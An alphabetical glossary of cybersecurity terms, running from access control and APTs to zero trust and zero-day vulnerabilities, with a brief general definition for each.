Glossary of Cybersecurity Terms

Access control: A security measure that restricts access to a system, network, or data, ensuring that only authorized individuals can access them.

Advanced Encryption Standard (AES): A widely used encryption algorithm that secures data by converting it into an unintelligible form. Advanced Persistent Threat (APT): A targeted and sophisticated cyber attack where an attacker gains access to a network or system and remains undetected for an extended period to gather information or cause damage.

Antivirus software: A program designed to detect and remove computer viruses and other malicious software.

Audit Trail: A chronological record of system activities, including user logins, file accesses, and system changes, used to track system usage and detect security violations.

Authentication: The process of verifying the identity of a user, device, or system before granting access to protected resources.

Authorization: The process of granting access to a resource or system based on the user's credentials and permissions.

Backdoor: A secret method of bypassing authentication or gaining access to a system or network.

Behavioral analytics: A technique that uses machine learning algorithms to analyze user behavior, identifying anomalies that may indicate potential threats.

Botnet: A network of compromised computers or devices, controlled remotely by an attacker to perform malicious activities.

Brute-force attack: A method of guessing passwords or encryption keys by trying all possible combinations until the correct one is found.

Cross-site scripting (XSS): A type of security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.

Cyber attack: An intentional and malicious attempt to damage, disrupt, or gain unauthorized access to a computer system or network.

Cyber espionage: The use of cyber techniques to gather sensitive information from other countries, companies or individuals for political, economic or military purposes.

Cyber kill chain: A framework used to describe the stages of a cyber attack, from reconnaissance to data exfiltration or destruction.

Cybercrime: Criminal activity that is carried out using the internet or other digital technologies, such as hacking, identity theft, or fraud.

Cybersecurity Framework: A framework developed by the National Institute of Standards and Technology (NIST) to help organizations manage and reduce cybersecurity risks.

Cybersecurity incident - Any event that potentially compromises the confidentiality, integrity or availability of information or information systems.

Cybersecurity Risk: The potential harm to an organization resulting from the exploitation of vulnerabilities in its systems, networks, or processes.

Cybersecurity Threat: Any potential danger to a computer system or network that could result in damage, unauthorized access, or data loss.

Cybersecurity: The practice of protecting computer systems, networks, and data from unauthorized access, theft, damage, or disruption.

Cyberwarfare: The use of computer technology to conduct acts of war, including espionage, sabotage, and attacks on critical infrastructure.

Data exfiltration: The unauthorized transfer of data from a network or system to an external location or server.

Decryption: The process of converting encrypted data back into its original form using a decryption key.

Denial of Service (DoS) attack: An attack that floods a network or server with traffic, making it unavailable to users.

Digital certificate: A digital document used to verify the identity of an entity, such as a website or individual, and to establish secure communication between them.

Digital forensics: The process of collecting, analyzing, and preserving electronic evidence to investigate cybercrime or other computer-related incidents.

Distributed Denial of Service (DDoS): An attack in which multiple systems are used to flood a network or server with traffic, causing it to become unavailable.

Encryption: The process of converting plain text into coded or encrypted text that can only be read by someone who has the appropriate decryption key.

Endpoint detection and response (EDR): A security solution that monitors and responds to threats at the endpoint or device level.

End-to-end encryption: A security measure that ensures that data is encrypted at the sender's device, transmitted securely, and decrypted only at the receiver's device.

Exploit: A piece of code or software that takes advantage of a vulnerability in a computer system or application to carry out malicious activities.

Exploit kit: A tool used by attackers to automate the process of identifying and exploiting vulnerabilities in software or systems.

Firewall: A security system that monitors and controls incoming and outgoing network traffic based on pre-defined security rules.

Hacking: The unauthorized access to or manipulation of computer systems, networks, or data.

Machine learning: A type of artificial intelligence that enables computers to learn and improve their performance by analyzing and identifying patterns in data.

Malware analysis: The process of analyzing and understanding the behavior of malware to develop detection and mitigation strategies.

Malware - Malicious software that is designed to damage or disrupt a computer system, steal sensitive information, or gain unauthorized access to a network.

Man-in-the-middle (MITM): An attack in which an attacker intercepts communication between two parties, allowing them to eavesdrop, modify, or inject false information.

Network security: The protection of a computer network from unauthorized access, theft, or damage.

Network segmentation: The practice of dividing a network into smaller, isolated segments to reduce the impact of a potential security breach.

Patch: A software update that fixes a known vulnerability or bug in an application or system.

Penetration testing: A simulated attack on a computer system, network, or application to identify vulnerabilities and test the effectiveness of security measures.

Phishing: A type of cyber attack where an attacker sends fraudulent emails or messages to trick individuals into providing sensitive information such as login credentials or financial information.

Public Key Infrastructure (PKI): A system that uses public and private keys to secure communication and authenticate users.

Ransomware: Malware that encrypts a victim's files or data, demanding payment in exchange for the decryption key.

Red teaming: An advanced penetration testing technique that involves simulating a full-scale cyber attack to identify weaknesses and improve security readiness.

Rootkit: A type of malware that allows an attacker to gain administrative-level access to a system, making it difficult to detect and remove.

Sandbox: A virtual environment that isolates and executes untested or suspicious files or applications to prevent them from affecting the host system.

Secure Sockets Layer (SSL): A protocol used to establish secure communication over the internet, typically used to secure e-commerce transactions and other sensitive data.

Security information and event management (SIEM): A solution that collects and analyzes security data from various sources to detect and respond to security incidents.

Side-channel attack: An attack that exploits physical or environmental characteristics of a system, such as power consumption or electromagnetic radiation, to extract information.

Sniffer: A tool used to capture and analyze network traffic, often used by attackers to steal sensitive information.

Social engineering: A tactic used by attackers to manipulate individuals into divulging sensitive information or performing actions that are harmful to a system or network.

Spoofing: A technique used by attackers to disguise their identity or impersonate a legitimate user or system.

SQL injection: A type of attack that exploits vulnerabilities in web applications to gain unauthorized access to a database or execute malicious code.

Threat hunting: A proactive approach to cybersecurity that involves searching for and investigating potential threats and vulnerabilities before they can be exploited.

Threat intelligence: Information about potential cyber threats, including tactics, techniques, and procedures used by attackers, gathered through monitoring and analysis of cyber activity.

Transport Layer Security (TLS): A protocol used to establish secure communication over the internet, replacing SSL as the industry standard.

Trojan: Malware that appears to be a legitimate program but contains hidden malicious code that can damage or compromise a system.

Two-factor authentication (2FA): A security measure that requires users to provide two forms of identification, usually a password and a unique code generated by a mobile app or hardware token.

Virtual Private Network (VPN): A network technology that creates a secure and encrypted connection between a remote device and a private network.

Virus: Malware that replicates itself and infects other programs or systems, often causing damage or stealing data.

Vulnerability: A weakness in a computer system, network, or application that can be exploited by attackers to gain unauthorized access or steal sensitive information.

Vulnerability assessment: The process of identifying and evaluating weaknesses and vulnerabilities in a network or system.

Worm: A self-replicating program that spreads through networks and systems, often causing damage or disrupting services.

Zero trust architecture: A security model that assumes that all network traffic, users, and devices are potential threats and requires authentication and authorization for every access attempt.

Zero-day exploit: A security vulnerability that is unknown to the software vendor and has not yet been patched, making it particularly dangerous to systems and networks.

Zero-day vulnerability: A vulnerability in software or hardware that is unknown to the developer or vendor and has not been addressed with a patch or update.